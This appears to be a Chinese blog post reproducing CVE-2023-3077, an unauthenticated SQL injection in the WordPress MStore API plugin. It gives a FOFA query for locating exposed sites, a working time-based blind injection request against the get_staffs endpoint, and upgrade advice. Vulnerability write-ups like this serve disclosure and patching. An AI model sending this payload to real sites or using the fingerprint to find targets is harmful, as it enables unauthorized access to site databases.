WordPress plugin MStore API SQL注入漏洞复现(CVE-2023-3077)

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

0x02 漏洞概述

WordPress plugin MStore API 3.9.8 版本之前存在SQL注入漏洞,该漏洞源于没有正确清理或转义某些字段,导致出现SQL注入,未经身份验证的远程攻击者可获取数据库敏感信息。

0x03 复现环境

FOFA:body="/wp-content/plugins/mstore-api/"

0x04 漏洞复现

PoC

复制代码
POST /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

延时6秒

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

将插件升级至安全版本

相关推荐
2601_9623649714 小时前
面向设备厂商:Windows Hello 认证摄像头核心要点
windows·安全·电脑
云边云科技_云网融合15 小时前
工业互联网组网方案全景解析:从低延迟网络到安全隔离的四大核心支柱
网络·安全·php
小程序设计15 小时前
linux防火墙研究与实现
网络·安全
数据知道16 小时前
加密流量分析——JA3 指纹、TLS 指纹识别与规避
网络·安全·网络安全·密码学
小程序设计16 小时前
Wi-Fi网络监控及无线终端定位系统的研究
网络·安全
这个DBA有点耶17 小时前
银行核心系统数据库迁移怎么选?6 步法+5 个避坑指南
数据库·安全·架构
xiaohaiAIgeo19 小时前
【2026年】补风型通风柜要不要装?节能与安全如何权衡
人工智能·安全·科普知识
网易易盾19 小时前
AI Agent行为链安全:实时监控、权限管控与持续评测
人工智能·安全
宁之明起(B服)19 小时前
struct2(vulhub靶场)指纹识别+沙箱绕过+反弹shell+webshell
web安全